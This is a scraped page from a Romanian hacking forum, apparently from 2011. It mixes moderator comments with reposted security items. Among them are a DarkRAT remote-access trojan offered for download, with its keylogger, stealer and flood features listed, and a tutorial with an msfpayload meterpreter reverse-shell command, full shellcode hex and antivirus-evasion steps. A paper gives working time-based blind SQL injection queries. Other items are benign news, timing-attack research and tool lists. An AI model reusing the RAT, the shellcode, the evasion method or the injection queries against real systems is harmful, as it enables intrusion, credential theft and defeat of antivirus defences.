Nytro

Pfff. Isi pune omu o imagine pe site si gata, e spart... Nu e niciun deface.

Cam prostie faza cu steal.cpp. Din C poti atat sa citesti fisiere cat si sa le uploadezi prin FTP sau altceva, si nu e deloc complicat. Si daca e facut totul din C te scapa de orice fel de dependinte. Dar ideea e buna, insa mai dificila e partea cu "infectatul".

http://www.youtube.com/watch?v=HBvIg_w1_Rw

Pff, de maine nu cred ca vor mai fi astfel de probleme. Ii rog pe cei carora le-au disparut conturile sa posteze: 1. Username - Sa isi creeze unul identic (cu membri VIP voi discuta in particular) 2. Link catre un post de pe vechiul cont sau user ID-ul username-ului vechi daca il stie Dar mai bine verific ce alte probleme pot sa apara, pe unde mai sunt foreign keys cu user id-ul vechi. O sa ma ocup diseara de asta daca am timp.

Astept de la HellScream alte probleme in afara de reputatie, semnatura si lista prieteni. Apoi o sa procedez la fel si cu celelalte conturi.

Posteaza si o mica descriere te rog. Nu cred ca are rost sa "ascunzi" link-urile. Mutat la Wireless.

[h=2]iPhone-urile explodeaz?. La propriu[/h]4 decembrie 2011, 11:45 | Autor: Ramona Dragomir Telefoanele inteligente ale Apple pun în pericol de moarte utilizatorii. S?pt?mâna trecut?, pasagerii unui avion au asistat la o întâmplare care i-a l?sat mu?i de uimire. Un iPhone 4 s-a aprins în momentul ateriz?rii începând s? fumege dens, acesta fiind acompaniat de o tent? ro?iatic? a carcasei. La doar câteva zile de la acest indicent, un b?rbat din Brazilia a asistat la o scen? asem?n?toare: telefonul a început s? scoat? fum ?i din el s? sar? scântei. „Smartphone-ul era conectat la priz?, pentru a se înc?rca. Totul s-a petrecut noaptea, când proprietarul dormea", potrivit „The Sun". Tragedia provocat? de un incendiu a putut fi evitat? doar pentru c? utilizatorul a observat scânteile. Piese contraf?cute Speciali?tii în domeniu încearc? s? elucideze cauzele care au dus la producerea acestor incidente. Ei sus?in c? în ambele cazuri, problemele sunt cauzate de utilizarea unor componente contraf?cute: baterii sau alte piese. Sursa: http://www.adevarul.ro/life/viata/iPhone-urile_explodeaza-_La_propriu_0_602939812.html

[h=5]DarkRAT v11.2 PHP RAT[/h]Nu l-am testat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Features : [?] -Restart [?] -Hibernate [?] -Logoff [?] -Open CDROM [?] -Close CDROM [?] -Mouse (0,0) [?] -Block Site [?] -Close process [?] -Delete File [?] -Set IE Home Page [?] -Set Clipboard [?] -Draw on screen [?] -Clean RecycleBin [?] -Block USB Write [?] -Unblock USB Write [?] -Set time [?] -Corrupt File [?] -Delete IE Cookies [?] -Delete IE History [?] -Delete IE Form data [?] -Delete IE Temp files [?] -Turn on monitor [?] -Turn off monitor [?] -Flip screen [?] -Un flipscreen [?] -Start screensaver [?] -Stop screensaver [?] -Mouse Clicker [?] -Swap Mouse - Left [?] -Swap Mouse - Right [?] -Disable Keyboard/Mouse [?] -Enable Keyboard/Mouse [?] -Disable desktop [?] -Enable desktop [?] -Focus desktop [?] -Show clock [?] -Hide clock [?] -Hide notify [?] -Show notify [?] -Mute sound [?] -Suspend proces [?] -Resume proces [?] -Hide taskbar [?] -Show taskbar [?] -Hide icons [?] -Show icons [?] -Change start button text [?] -Lock clipboard [?] -Unlock clipboard [?] -Turn on hidden files [?] -Turn off hidden files [?] -Change background [?] -Enable Taskmanager [?] -Disable Taskmanager [?] -Enable CMD [?] -Disable CMD [?] -Enable Registry [?] -Disable Registry [?] -Enable System Restore [?] -Disable System Restore [?] -Print [?] -Fake BSOD on [?] -Fake BSOD off [?] -Crazy CAPS Lock on [?] -Crazy CAPS Lock off [?] -Fake message [?] -Open program [?] -Open website [?] -Remote desktop [?] -Remote webcam [?] -Process manager [?] -Keylogger [?] -Chat [?] -UDP Flood [?] -PoD [?] -HTTP Flood [?] -Read Clipboard [?] -Filezilla data [?] -Camstasia Licence [?] -Windows Wallpaper Path [?] -SAMP Server Data [?] -Windows Product Key [?] -Firefox Data [?] -Last 25 Sites [?] -Default Browser Path [?] - Login system [?] - Customize your DarkRAT Background. [?] - Greater stability [?] - Icon changer [?] - Unlimited binder [?] - Improved security [?] - Chrome stealer [?] - Delete Clientregistry.blob(steam) Pequeño tutorial: 1- Upload la carpeta phh a tu servidor web 2- Dale permisos 777 (chmod) 3- Ejecuta "Dark RAT.exe" y escribe la direccion de donde subiste la carpeta "php" Ejemplo "http://tuweb.com/php/" 4- Luego dale a conectar y listo el cliente se conectara al servidor web al igual que el server (remoto) de esa forma no es necesario abrir ningun puerto en tu pc Download: http://www.megaupload.com/?d=J0SKO8J0 Fuente PD: Hace falta Framework Sursa: http://www.underc0de.org/foro/index.php?topic=7936.msg29577

[h=3]Chrome & Opera PoC: rapid history extraction through non-destructive cache timing[/h] This is an experimental port of my of my Firefox cache timing script, designed to work in Chrome and Opera. I had no chance to test this version very thoroughly, so I am not yet sure how reliable it will be in the wild. Your feedback is appreciated. Please refer to the top-level page for more. information about the purpose and the design of this tool. A se vedea codul sursa: http://lcamtuf.coredump.cx/cachetime/chrome.html

[h=2]Timing Attacks on CSS Shaders[/h][h=2]Saturday, December 3, 2011[/h] CSS Shaders is a new feature folks from Adobe, Apple, and Opera have proposed to the W3C CSS-SVG Effects Task Force. Rather than being limited to pre-canned effects, such as gradients and drop shadows, CSS Shaders would let web developers apply arbitrary OpenGL shaders to their content. That makes for some really impressive demos. Unfortunately, CSS Shaders has a security problem. To understand the security problem with CSS Shaders, it's helpful to recall a recent security issue with WebGL. Similar to CSS Shaders, WebGL lets developers use OpenGL shaders in their web applications. Originally, WebGL let these shaders operate on arbitrary textures, including textures fetched from other origins. Unfortunately, this design was vulnerable to a timing attack because the runtime of OpenGL shaders can depend on their inputs. Using the shader code below, James Forshaw built a compelling proof-of-concept attack that extracted pixel values from a cross-origin image using WebGL: [INDENT] [FONT=Courier New]for (int i = 0; i <= 1024; i += 1) { // Exit loop early depending on pixel brightness currCol.r -= 1.0; if (currCol.r <= 0.0) { currCol.r = 0.0; break; } } [/FONT] [/INDENT] Timing attacks are difficult to mitigate because once the sensitive data is present in the timing channel it's very difficult to remove. Using techniques like bucketing, we can limit the number of bits an attacker can extract per second, but, given enough time, the attacker can still steal the sensitive data. The best solution is the one WebGL adopted: prevent sensitive data from entering the timing channel. WebGL accomplished this by requiring cross-origin textures to be authorized via Cross-Origin Resource Sharing. There's a direct application of this attack to CSS Shaders. Because web sites are allowed to display content that they are not allowed to read, an attacker can use a Forshaw-style CSS shader read confidential information via the timing channel. For example, a web site could use CSS shaders to extract your identity from an embedded Facebook Like button. More subtly, a web site could extract your browsing history bypassing David Baron's defense against history sniffing. The authors of the CSS Shaders proposal are aware of these issues. In the Security Considerations section of their proposal, they write: However, it seems difficult to mount such an attack with CSS shaders because the means to measure the time taken by a cross-domain shader are limited. Now, I don't have a proof-of-concept attack, but this claim is fairly dubious. The history of timing attacks, including other web timing attacks, teaches us that even subtle leaks in the timing channel can lead to practical attacks. Given that we've seen practical applications of the WebGL version of this attack, it seems quite likely CSS Shaders are vulnerable to timing attacks. Specifically, there are a number of mechanisms for timing rendering. For example, MozBeforePaint and MozAfterPaint provide a mechanism for measuring paint times directly. Also, the behavior of requestAnimationFrame contains information about rendering times. Without a proof-of-concept attack we cannot be completely certain that these attacks on CSS Shaders are practical, but waiting for proof-of-concept attacks before addressing security concerns isn't a path that leads to security. Sursa: Scheme/Host/Port: Timing Attacks on CSS Shaders

Nu stiu, o sa ma uit in baza de date sa vad ce se intampla de fapt. HellScream: Am facut modificari prin baza de date si acum ar trebui cel putin partial sa fie Ok. Spune-mi ce probleme apar, inainte sa fac acelasi lucru si pentru alti membri. Practic ai pierdut datele de pe noul cont, dar ar trebui sa fie ok datele de pe vechiul cont. Acum plm, depinde ce cacat s-a mai "sters" (a disparut) din baza de date.

[h=1]Python tools for penetration testers[/h] If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them. Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs. Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out, because the legal situation of these tools is still a bit unclear in Germany -- even after the decision of the highest court. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side. [h=3]Network[/h] Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection Dirtbags py-pcap: read pcap files without libpcap flowgrep: grep through packet payloads using regular expressions httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist Mallory, man-in-the-middle proxy for testing mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly [h=3]Debugging and reverse engineering[/h] Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH Immunity Debugger: scriptable GUI and command line debugger IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro PyEMU: fully scriptable IA-32 emulator, useful for malware analysis pefile: read and work with Portable Executable (aka PE) files pydasm: Python interface to the libdasm x86 disassembling library PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory diStorm64: disassembler library for AMD64, licensed under the BSD license python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python [h=3]Fuzzing[/h] Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing antiparser: fuzz testing and fault injection API TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer untidy: general purpose XML fuzzer Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer) FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches SMUDGE Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns Fuzzbox: multi-codec media fuzzer Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms WSBang: perform automated security testing of SOAP based web services Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano Fusil: Python library used to write fuzzing programs [h=3]Web[/h] ProxMon: processes proxy logs and reports discovered issues WSMap: find web service endpoints and discovery files Twill: browse the Web from a command-line interface. Supports automated Web testing Windmill: web testing tool designed to let you painlessly automate and debug your web application FunkLoad: functional and load web tester [h=3]Forensics[/h] Volatility: extract digital artifacts from volatile memory (RAM) samples SandMan: read the hibernation file, regardless of Windows version LibForensics: library for developing digital forensics applications TrIDLib, identify file types from their binary signatures. Now includes Python binding [h=3]Malware analysis[/h] pyew: command line hexadecimal editor and disassembler, mainly to analyze malware Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content pyClamAV: add virus detection capabilities to your Python software jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities yara-python: identify and classify malware samples [h=3]PDF[/h] Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF) Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified. Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files pyPDF: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt... PDFMiner: extract text from PDF files python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support [h=3]Misc[/h] InlineEgg: toolbox of classes for writing small assembly programs in Python Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging RevHosts: enumerate virtual hosts for a given IP address simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools Hachoir: view and edit a binary stream field by field [h=3]Other useful libraries and tools[/h] IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system Beautiful Soup: HTML parser optimized for screen-scraping matplotlib: make 2D plots of arrays Mayavi: 3D scientific data visualization and plotting RTGraph3D: create dynamic graphs in 3D Twisted: event-driven networking engine Suds: lightweight SOAP client for consuming Web Services M2Crypto: most complete OpenSSL wrapper NetworkX: graph library (edges, nodes) pyparsing: general parsing module lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language Pexpect: control and automate other programs, similar to Don Libes `Expect` system Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython PyQt and PySide: Python bindings for the Qt application framework and GUI library For more libaries, please have a look at PyPI, the Python Package Index. Sursa: Dirk Loss: Python tools for penetration testers

Indexed blind SQL injection From: Nam Nguyen Date: Sat, 3 Dec 2011 08:49:37 -0800 Indexed blind SQL injection From: Nam Nguyen <namn () bluemoon com vn> Date: Sat, 3 Dec 2011 08:49:37 -0800 =========================== Indexed blind SQL injection =========================== :Author: gamma95 <gamma95 [at] gmail> and his minions :Date: December 03, 2011 Time based blind SQL attack suffers from low bit/request ratio. Each request produces only one valuable bit of information. This paper describes a tweak that produces higher yield at the expense of longer runtime. Along the way, some issues and notes of applicability are also discussed. Background ++++++++++ Time based blind SQL injection attack is probably the most well-known technique in the planet. The method works by analyzing the time difference in various queries. Because query execution time is a side effect of a query, no visible output is required for this method to succeed. For example, a query could request that the DBMS to sleep for 10 seconds if the first character of the username is ``A``. Usually, time based technique go hand in hand with binary search. Instead of asking if the first character is ``1``, then ``2``, then ``3``, it could partition the possible values into two ranges (say from ``0`` to ``4`` and ``5`` to ``9``) and ask if the first character is less than ``5``. Depending on the result, it picks out the more likely range and repeats the process until there is only one possible value. This effectively puts a logarithmic bound on number of requests to the DBMS. In other words, each request gives us one bit of information. Increasing the usable bit/request ratio +++++++++++++++++++++++++++++++++++++++ Due to low bit/request ratio, an attack attempt usually leaves behind too many requests in access log. This is undesirable. A better approach could be to encode the correct value into query execution time itself. For example, if we know the value is a number from 0 to 9, we could ask DBMS to sleep for that many seconds straight. In this case, one request carries more than 3 bits of usable information. This is the principal idea behind our tweak. Indexed time based attack +++++++++++++++++++++++++ To encode more bits into the execution time, we must work with variable numeric delay values. Therefore, we need two things: + A measurable delay interval. Too short the interval and network latency could negatively affect our measurement. Too long the delay will also waste our time. + And its mapping to target values. A delay of one second could mean character ``A`` or it could also mean some other value, depending on the possible domain. These necessitate an array-like index search. Say, if our domain is ten (character) values from ``0`` to ``9``, then we can easily combine them into an array like shown below. :: 1 2 3 4 5 6 7 8 9 10 (index) | | | | | | | | | | v v v v v v v v v v +---+---+---+---+---+---+---+---+---+---+ | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | (value) +---+---+---+---+---+---+---+---+---+---+ Given a random character, we can tell in one request if it is in this set, and if it is, what specific character it actually is. The way to do that is by delaying query time by the index of the character. If the input character is not in the set, there will be no delay. If it is, its index is determinable from the sleep time. An example ++++++++++ Suppose we are trying to grab version information from a **MySQL** server. Possible characters include 0-9 and period. Observe the execution time. :: select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (6.04 sec) # index 6, value '5' select sleep(find_in_set(mid(@@version, 2, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (11.00 sec) # index 11, value '.' select sleep(find_in_set(mid(@@version, 3, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (2.00 sec) # index 2, value '1' ... Each request gives us exactly one character (not bit). Notes of applicability ++++++++++++++++++++++ Adjusting sleep time ==================== Faster sleep time is easily achievable by multiplying the index with some factor smaller than 1. For example, we can sleep half the time as before:: select sleep(0.5 * find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (3.00 sec) # index 6, value '5' Similarly, longer sleep time can use factors greater than 1. Guarding against network latency ================================ Time based attack generally works best in a fast and reliable networked environment. Small jitters in latency could skew the measurements and affect end result. However, this technique we are describing here could be modified to support network latency. The idea is that since sleeping time is a calculated number, we could add to it a fixed amount of time for latency, or prepend some invalid characters (such as ``a`` when the domain is 0-9) in the domain set. :: select sleep(find_in_set(mid(@@version, 1, 1), 'a,a,a,a,0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (10.00 sec) # index 10, value '5' We can also sprinkle invalid characters in between valid characters to manually adjust amount of sleeping time. Picking an acceptable domain ============================ The set of possible values should be carefully picked to match the value that one expects. Wide domain (more values) has a better chance of catching the input, but it requires a longer sleep time on average. Narrow domain (less values) has slimmer chance to catch the input, but it generally finishes faster on average. Some web frameworks enforce a maximum execution time. A query that takes more than, say, 30 seconds will be prime target for an early termination (and possibly logging). Therefore, picking out an acceptable domain is not only an optimization but sometimes a necessity. Using other functions ===================== ``find_in_set`` is only one of the string search functions that MySQL supports. One can also use other functions such as ``instr``, ``locate``, and ``position``. Sleeping in ``WHERE`` clause ============================ Most of the time, the injection point is in a ``WHERE`` clause. Because the ``WHERE`` clause is tested against all candidate rows, we better make sure that there is only **one** candidate. We can do that by making sure the table scan produces one row. Otherwise, our sleep measure will be multiplied up by the number of candidates. :: create table test (a int primary key, b char(16)); insert into test values(1, 'abcd'); insert into test values(2, 'zyxw'); select count(*) from test; +----------+ | count(*) | +----------+ | 2 | +----------+ # we have 2 rows in table test select * from test where sleep(locate(mid(@@version, 1, 1), '0123456789.')); Empty set (12.00 sec) # here we sleep for 12 seconds because all (2) rows are tested select * from test where a=1 and sleep(locate(mid(@@version, 1, 1), '0123456789.')); Empty set (6.00 sec) # here we sleep for 6 seconds because only one row is tested Conclusion ++++++++++ This paper described a small tweak to the well-known time based SQL injection technique. The principle behind the increase in bit/request ratio is encoding more information in the query execution time. This is done with index based array search functions such as ``find_in_set``. The desirably smaller number of requests comes at the expense of generally longer execution time. This paper also discussed about some technical concerns that one must pay close attention to when employing the technique. Minute aspects such as table scan, applicable value domain, network latency, and amount of sleep time are at the top list to watch out for. Acknowledgement +++++++++++++++ Thanks go to Nam Nguyen for his early review and support. -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn -- Nam Nguyen, CISA, CISSP, CSSLP Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn Sursa: Full Disclosure: Indexed blind SQL injection

[h=2]Writing Self-modifying Code Part 1: C Hello world with RWX and in-line assembly[/h] November 21st, 2011|By: aking To follow along with this tutorial, download all source files here In the first part of this tutorial, we’ll be making a basic C scaffold and getting read, write, and execute permissions for the memory section. This way we’ll be able to have some self-modifying code in the following tutorials. We’ll begin with a hello.c, hellodll.c, hellodll.h, and makefile. Readers should be able to use an Ubuntu virtual machine and simply: apt-get install build-essential mingw32 in order to follow along. The hello.c file is a simple dll loader. The hellodll.c is a simple dll where we will insert some assembly structures or none at all to confirm our setup is working properly. We can then hook up a debugger and step through our simple example to see what changes when we modify the code. GDB is open source, freely available, cross platform, and cross architecture. In the tutorial we’ll use Immunity Debugger since it has a much cleaner and more intuitive interface. It is easily installable in wine. You need full python 2.7. If you have problems check out Google’s responses for “wine msiexec”. Let’s get started by downloading the example code and test compiling it. The video here is one chunk. That’s the beauty of pause. You can either read it all then get some clarification from the video, or exercise your right to pause. Let’s take a look at the source files: DOWNLOAD SOURCE FILES ZIP HERE If we take a look at the source files, hello.c does little more than call LoadLibrary and call the first exported function in the Dll. The reason we use this approach is that many anti-virus products won’t detect malicious code dropped inside of a Dll. They do detect some similar code when dropped directly behind a simple PE header. If the goal is going to be to write self modifying code we’re going to need to get read, write, and execute permissions. There are a lot of ways to do this. We could use any number of functions to change the permissions on a memory section or process. Let’s do this for a memory section since process wide DEP can be force enabled. The MSDN tells us that the VirtualProtect function is portable across all versions of windows and we can set permissions to whatever we want. Let’s use the raw values instead of symbolic constants to make the code more portable even if it’s a little less readable. Some example code would be: int vpretval = VirtualProtect( baseaddress, memlen, newprotect, &oldprotect); But how are we going to get the size of the code? This could be troublesome. Setting the size statically could be a bad idea. Let’s insert a marker function so we can do a little simple arithmetic and have a functional VirtualProtect call. If you want to find out if this is working you can print out some debugging information. Once you’re sure it’s working, let’s do away with that pesky console window by changing our makefile a little bit. FROM: $(CC) -o loader.exe loader.o $(DLLNAME).dll TO: $(CC) -o loader.exe -mwindows loader.o $(DLLNAME).dll Simple payloads dropped behind an executable header are pretty easily detected. This can be demonstrated by generating a malicious binary with the following command: msfpayload windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.1.1 x>test.exe and scanning with http://www.virustotal.com. We could use an off the shelf encoder that’s built in to metasploit. Shikata is fairly effective and becomes more effective with higher iterations. Eventually the vendors will probably start detecting just the encoders though. For the purposes of this tutorial we’ll stick with Avast and AVG since they are free, and one detects some malicious shell-code when simply dropped in to a function of a Dll. So we were detected using the Metasploit built-in executable generator the vast majority of the time. Our goal is the ability to build custom APT software as a demonstration for penetration testing contracts anyway right? Now let’s take a look at our test compiled files. After entering the project directory and running make we can attach Immunity Debugger, breakpoint on our GetProcAddress call, then step in to our call eax. Now we’re in the DLL. This first part is a common preamble and will differ slightly depending on the arguments we pass in to our function. After that we can see our NOPs and return. Let’s take a look at our memory permissions to make sure our VirtualProtect call worked. I did include a debug flag detection, but it’s not in the makefile. That’s a really simple exercise to get you used to mingw32 and makefiles. Hint: -D and ifdef. This is all pretty simple. Let’s step it up a bit and drop in some shell-code. Inserting NOPs is as simple as dropping in: asm( “nop;” “nop;” ); Just repeat the “nop;” line for as many iterations as you need. Very simple. You could automate this part of the process to put in as many bytes as you need for the shellcode and drop it in directly. Of course, that would eliminate the next exercise…so let’s keep reading. Do remember that in-line assembly each line has to be quoted and end in a ;. Now that we’ve been detected by both products, let’s try putting some shellcode inside a function. A simple procedure for this is to use the common and freely available tool objdump to get the assembly back from the opcodes. We accomplish this by copying the shell-code generated by the metasploit framework into a .bin file and dumping it with objdump using the following steps. First copy all this: fce8890000006089e531d2648b52308b520c8b52148b72280f b74a2631ff31c0ac3c617c022c20c1cf0d01 c7e2f052578b52108b423c01d08b407885c0744a01d0508b48 188b582001d3e33c498b348b01d631ff31c 0acc1cf0d01c738e075f4037df83b7d2475e2588b582401d36 68b0c4b8b581c01d38b048b01d089442424 5b5b61595a51ffe0585f5a8b12eb865d683332000068777332 5f54684c772607ffd5b89001000029c4545 06829806b00ffd5505050504050405068ea0fdfe0ffd589c73 1db53680200115c89e66a10565768c2db376 7ffd5535768b7e938ffffd55353576874ec3be1ffd55789c76 8756e4d61ffd568636d640089e357575731f6 6a125956e2fd66c744243c01018d442410c600445450565656 46564e565653566879cc3f86ffd589e04e5 646ff306808871d60ffd5bbf0b5a25668a695bd9dffd53c067 c0a80fbe07505bb4713726f6a0053ffd5 in to a .bin file with your hex editor of choice. Winhex is free and runs under wine. Unlike a lot of the free hex editors for linux that won’t increase the length of a file or support pasting very well, this one just works. Alternately, you could convert it to hex and write it to disk with a simple python script like so: Click here to download python/shellcodetxt2bin.py This is simpler, but all of the text representation must be on one line. If you want multiple line breaks and msfpayload .c output you need to look in to regex replacing \x, \n, and possibly \r. This is the same for ImmDbg binary copies. We have to fix up jumps in order to get this to compile since mingw32 uses labels and doesn’t recognize the offsets. So we use this command to tell objdump 1)disassemble the whole thing, 2)it’s just a raw binary file, 3)architecture, 4)assembly code format, and 5) filename. objdump -D -b binary -m i386 -M intel shellcode.bin You have to fix up the jumps from relative offsets to jump labels. If you’re exact byte-code doesn’t match, it could be the compiler using regular jumps where short jumps used to be or something very similar. See if you can do the fix-ups yourself. After fixing up the shell-code for our purposes it goes from looking something like this: Click here to download shellcodeexample/shellcodedump.txt to looking more like this:———————————————- Click to download shellcodeexample/shellcodefixup.txt Now we simply drop this shell-code in to a function and see what happens. The example code gets detected by Avast. It does not get detected by AVG. If it doesn’t get detected by either, some of your jumps got compiled a little differently. We could have shortcut this by compiling with a bunch of NOPs and dropping it in with a hex editor. That last part was a good exercise anyway. Here’s the screenshot that shows this shellcode getting detected from within a function: We’re getting Read,Write, and Execute at load time to simplify the disassembly. We’ll change that in the next tutorial when we get in to extended assembly. Let’s take a look at what happens now. We got passed most anti-virus on http://www.virustotal.com with this approach, but we want to do a little more. We need to bypass Avast. We could insert some NOPs and our jumps would adjust automatically since we’re compiling from source. In order to find out what part of the shellcode actually triggers the definition, we can do something like replacing sections of instructions with garbage and scanning a bunch of files. That doesn’t really scale though and is kind of like fuzzing the anti-virus system. That’s why we’re going to make a custom encoding and decoding section. So, hopefully you found it interesting. We’ll talk again soon. Thanks for listening. Sursa: http://resources.infosecinstitute.com/writing-self-modifying-code-part-1/

XSSer v1.6 -beta- aka "Grey Swarm!" released. From: psy <root () lordepsylon net> Date: Thu, 01 Dec 2011 00:45:12 +0100 Hi list, There is released a new version of *XSSer* (v1.6-beta-) - the cross site scripter framework. Take a look to the XSSer website to see new features implemented, screenshots, documentation, etc... http://xsser.sf.net You can download original code directly from here: http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download Or update your copy from the XSSer svn repository: $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser Also, you have on the main website some pre-compiled packages (ArchLinux, Debian/Ubuntu, Gentoo, etc..) "Are you ready for the Grey Swarm!?" Happy cross hacking. psy. Sursa: Full Disclosure: XSSer v1.6 -beta- aka "Grey Swarm!" released.

O sa ma uit in baza de date sa vad daca se poate fara foarte mult chin. Si nu ma refer la reputatie, nu e o problema asta, ci la posturi.

A bit away from Kernel execution By ar1vr (01/12/2011) picturoku.blogspot.com Whitepaper called A Bit Away From Kernel Execution. A 'write-what-where' kernel memory overwrite tale. Download: http://dl.packetstormsecurity.net/papers/general/kernel-execution.pdf

[h=1]A Collection of Examples of 64-bit Errors in Real Programs[/h] Abstract Introduction Example 1. Buffer overflow Example 2. Unnecessary type conversions Example 3. Incorrect #ifdef's Example 4. Confusion of int and int* Example 5. Using deprecated (obsolete) functions Example 6. Truncation of values at an implicit type conversion Example 7. Undefined functions in C Example 8. Remains of dinosaurs in large and old programs Example 9. Virtual functions Example 10. Magic constants as parameters Example 11. Magic constants denoting size Example 12. Stack overflow Example 13. A function with a variable number of arguments and buffer overflow Example 14. A function with a variable number of arguments and wrong format Example 15. Storing integer values in double Example 16. Address arithmetic. A + B != A - (- Example 17. Address arithmetic. Signed and unsigned types. Example 18. Address arithmetic. Overflows. Example 19. Changing an array's type Example 20. Wrapping a pointer in a 32-bit type Example 21. Memsize-types in unions Example 22. An infinity loop Example 23. Bit operations and NOT operation Example 24. Bit operations, offsets Example 25. Bit operations and sign extension Example 26. Serialization and data exchange Example 27. Changes in type alignment Example 28. Type alignments and why you mustn't write sizeof(x) + sizeof(y) Example 29. Overloaded functions Example 30. Errors in 32-bit units working in WoW64 Summary References [h=2]Abstract[/h] This article is the most complete collection of examples of 64-bit errors in the C and C++ languages. The article is intended for Windows-application developers who use Visual C++, however, it will be useful for other programmers as well. [h=2]Introduction[/h] Our company OOO "Program Verification Systems" develops a special static analyzer Viva64 that detects 64-bit errors in the code of C/C++ applications. During this development process we constantly enlarge our collection of examples of 64-bit defects, so we decided to gather the most interesting ones in this article. Here you will find examples both taken directly from the code of real applications and composed synthetically relying on real code since such errors are too "extended" throughout the native code. The article only demonstrates various types of 64-bit errors and does not describe methods of detecting and preventing them. If you want to know how to diagnose and fix defects in 64-bit programs, please see the following sources: Lessons on development of 64-bit C/C++ applications [1]; About size_t and ptrdiff_t [2]; 20 issues of porting C++ code on the 64-bit platform [3]; PVS-Studio Tutorial [4]; A 64-bit horse that can count [5]. You may also try the demo version of the PVS-Studio tool that includes the Viva64 static code analyzer which detects almost all the errors described in this article. The demo version of the tool can be downloaded here: http://www.viva64.com/pvs-studio/download/. Online: http://www.viva64.com/en/a/0065/print/

[h=1]Is Linux Mint an Ubuntu-Killer?[/h] User traffic and key design changes suggest that Mint is a serious challenger to the King of Linux. Suddenly, everyone's talking about Linux Mint. A six-year-old distribution based on Ubuntu and Debian, Linux Mint has always enjoyed considerable popularity, but, in the last month, it has started receiving dramatically more attention. This attention has two main reasons. First, pundits have been debating the meaning (if any) of the fact that Linux Mint has received over two and a half times more page views than Ubuntu on Distrowatch for the past month. Second, Linux Mint's new 12.0 release, codenamed "Lisa," features the Mint GNOME Shell Extensions (MGSE), a set of modifications that offer alternatives to the most obvious cosmetic and conceptual changes in the GNOME 3 release series. MGSE offers a desktop much like the GNOME 2 series while preserving the most useful of GNOME 3's innovations. This development is so bizarre that it could only make sense in the free and open source software community. Still, the combination of possible new popularity and MGSE is enough to start the community speculating whether Ubuntu users, discontent with the new Unity shell, are looking to Linux Mint as a replacement. At first glance, the idea is absurd. Given that MGSE modifies the GNOME 3.2 release, you might convincingly speculate that Linux Mint has provided the solution for the many who are unhappy with GNOME's current directions. But challenge Ubuntu? Canonical, Ubuntu's commercial arm, claims twenty million users, and is promoting the distribution heavily. By contrast, Linux Mint is a much smaller, non-commercial organization that appears to be less organized, and to have fewer resources to draw upon. In fact, it relies on donations and ingenuity for funding. Yet is the idea even technically possible? Certainly Linux Mint's team and its supporters think so, considering that for several years they have been calling Linux Mint the fourth most widely used operating system, which sounds like a deliberate challenge to Ubuntu's claim to be the third. One way or the other, a closer look seems in order. Although Linux Mint offers a Debian-based edition, the majority of its releases are based on Ubuntu. Nor, so far, is the new release an exception. On the one hand, Linux Mint and Ubuntu share the same installer and boot in more or less the same time on the same machine. They share, too, the same array of GNOME-based software, down to Ubuntu 11.10's replacement of Evolution 